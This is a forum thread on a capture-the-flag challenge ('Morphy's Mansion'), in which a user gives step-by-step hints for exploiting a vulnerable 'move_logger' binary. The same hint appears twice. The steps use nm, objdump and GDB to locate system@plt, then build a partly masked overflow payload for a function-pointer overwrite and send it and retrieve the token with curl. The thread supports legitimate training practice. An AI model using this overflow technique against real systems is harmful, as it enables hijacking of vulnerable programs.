Forum Discussion
PRABAKARANRAMAMURTHY
Bronze III
Bronze IIITrick or Treat on Specter Street: Morphy's Mansion Challenge
I understand that the move_logger is the vulnerable program, and tried a few methods to exploit it. However, where is the token.txt? Anyone managed to find it?
"Whatever means necessary" is quite broad. Any hints from anyone?
For those who are looking for some hints:
The strategy was to use No-ROP Function-Pointer Overwrite.Following the steps below:
- Check Backend Health
curl -s http://x.x.x.x/api/health - Analyze Vulnerable Binary:
nm -C ./move_logger | grep rotate_old_logs
objdump -d ./move_logger | awk '/<system@plt>/{print; getline; print}' - Confirm Stack Layout in GDB
(use PEDA and execute: p &moves , p &log to find the buffer size) - Craft Overflow Payload:
Payload: e4aaaaaaaaaaaaaaXXXXXX0000000000 - Exploit via API - curl POST
- Retrieve Token by using curl
Hope that helps.
- Check Backend Health
1 Reply
PRABAKARANRAMAMURTHYFor those who are looking for some hints:
The strategy was to use No-ROP Function-Pointer Overwrite.Following the steps below:
- Check Backend Health
curl -s http://x.x.x.x/api/health - Analyze Vulnerable Binary:
nm -C ./move_logger | grep rotate_old_logs
objdump -d ./move_logger | awk '/<system@plt>/{print; getline; print}' - Confirm Stack Layout in GDB
(use PEDA and execute: p &moves , p &log to find the buffer size) - Craft Overflow Payload:
Payload: e4aaaaaaaaaaaaaaXXXXXX0000000000 - Exploit via API - curl POST
- Retrieve Token by using curl
Hope that helps.
- Check Backend Health
